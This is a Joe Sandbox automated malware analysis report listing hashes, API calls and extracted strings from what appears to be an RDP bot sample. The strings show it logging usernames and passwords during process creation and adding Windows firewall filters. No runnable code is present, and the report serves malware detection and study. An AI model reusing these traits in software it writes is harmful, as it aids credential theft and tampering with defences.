                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
                                                      • Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
                                                      • Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction ID: 327dcdab640119780b6a5418200b56028045533e93150860ad6b174d729a2151
                                                      • Opcode Fuzzy Hash: 05b559bd4724005287958f140b8183a08227340bf4a559bd9d3731c32517380e
                                                      • Instruction Fuzzy Hash: A8F05E13F48203C3FD529A09B6807B96261AFAA761E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction ID: 124597de748472ad24060ff1b70a01ad1025f7f407483bf1de18b61c2d7c7367
                                                      • Opcode Fuzzy Hash: 45454886e19af0f3a1d46188feaae8401dd09c0e9c6c59378aac8472f3ab07f3
                                                      • Instruction Fuzzy Hash: 7FF05E13B48203C3FD529A09B6817B96261AFAA765E890535ED5C8F6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction ID: b3bdd22cde69bf3090957c40fe9e36941defbb761cdd6d8862c20391795350a2
                                                      • Opcode Fuzzy Hash: e599e79aec15f9801f37150ba1dbf11dbf751d0666428e49097c96ca17fbfad9
                                                      • Instruction Fuzzy Hash: C2F0B413B48203C3FD529A0876807B921215FAA761E890535ED0C8E6D1EE3C68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction ID: e7610c4f53ef4b956401f3525b0aa808724e35ad2750b4b5f3ad730550baf1fd
                                                      • Opcode Fuzzy Hash: fc9ac18d2d3b85d97e220ba5648c8f5163264cc353de88d57e199d5ec4a0326b
                                                      • Instruction Fuzzy Hash: 02F05E13F48203C3FD529A09B6807B96261AFAA765E890535ED5C8E6D1EE3DA8878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction ID: 1f846159e828160cd3cdc8d0a8ca913923ba2e82c14d2e6748f813c85ec08460
                                                      • Opcode Fuzzy Hash: e33692760d6982d61dafc9675408eb25253a5ea45f82db5d17f1cf7bcd550c10
                                                      • Instruction Fuzzy Hash: F4F05413B48203C3FD529A0976807B961615FAA765E890535ED5CCE6D1EE3D68878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
                                                      • Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
                                                      • Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
                                                      • Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
                                                      • Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                                      • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                                      • API String ID: 1842180197-3127737957
                                                      • Opcode ID: 53ec143df6af64bbed9861a0fc667b94bfec076aa910c4003055f79a7445760f
                                                      • Instruction ID: 36a27e106f51ebcfd024290aa87e375d6edbd6e0ab6b8945ecfe6130600a2ba7
                                                      • Opcode Fuzzy Hash: 53ec143df6af64bbed9861a0fc667b94bfec076aa910c4003055f79a7445760f
                                                      • Instruction Fuzzy Hash: 2E1264A194C643C2FE708B0AE6843B962B4FB6E744F540132FA4E8F694DF3DE5859709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                      • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                      • API String ID: 4253334766-1535167640
                                                      • Opcode ID: 4df82a89110796e5bc07bc0514147b914851caf7b0973821b63fcd9de12ae24f
                                                      • Instruction ID: 7a1e1c9e2eeea5e24ace47f057b3160e6dd99463159cadfbdbfa6f950ca12df8
                                                      • Opcode Fuzzy Hash: 4df82a89110796e5bc07bc0514147b914851caf7b0973821b63fcd9de12ae24f
                                                      • Instruction Fuzzy Hash: 24614B21E5C553C7FE60671CA6883B92270EB3A354F540132F89ECF2D0DE6EA9499249
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                      • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                      • API String ID: 2123903355-2019010457
                                                      • Opcode ID: 4f6991ac9f89fd7611e1659217fb5fe61bd675e75ff2adad2c7ac8f6f62c38dc
                                                      • Instruction ID: 50fbce0e2edab6b4a575a7075697011a1f473a83cac9885397032276abe2c9ea
                                                      • Opcode Fuzzy Hash: 4f6991ac9f89fd7611e1659217fb5fe61bd675e75ff2adad2c7ac8f6f62c38dc
                                                      • Instruction Fuzzy Hash: B2412AB1A08642CBEB90CF68E68056977B0FB2D754F440135FA5DCB698EE3CE944CB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                      • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                      • API String ID: 384173800-4041758303
                                                      • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                      • Instruction ID: 23d9c1a680d2348d828d17296a9b7d8f846f3540b2c40170a66acc8ccdcff69c
                                                      • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                      • Instruction Fuzzy Hash: EDF0FE30E5BA17D1ED05DB55FED00B42374BF2E780F440132E84D9A328EE6CA94AC309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fflushfwriteinet_addrntohl
                                                      • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                                                      • API String ID: 3255839625-58178811
                                                      • Opcode ID: 54b0ca27f2cd3d416422a108330809e770685ec5bff1d9a2d2897b8d07f325aa
                                                      • Instruction ID: 6811af505ae4070cbaa85d2d51a39ea337a5640801c3945b15e4bbdef1ffe88d
                                                      • Opcode Fuzzy Hash: 54b0ca27f2cd3d416422a108330809e770685ec5bff1d9a2d2897b8d07f325aa
                                                      • Instruction Fuzzy Hash: 8F517E3261CBC5C9E7718B28B4403DA76B5EB99780F444125E6CC8BB99EF3DC185CB44
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID:
                                                      • API String ID: 2086374402-0
                                                      • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                      • Instruction ID: d722d52c10e909be06c5d869de25f84bbb47aea93fd7c876f1cfd4f1260907bb
                                                      • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                      • Instruction Fuzzy Hash: 88E022E272880583EF20C60DE0807BBA361CBAC384F504030F95DC7B68DE2CD9428B40
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
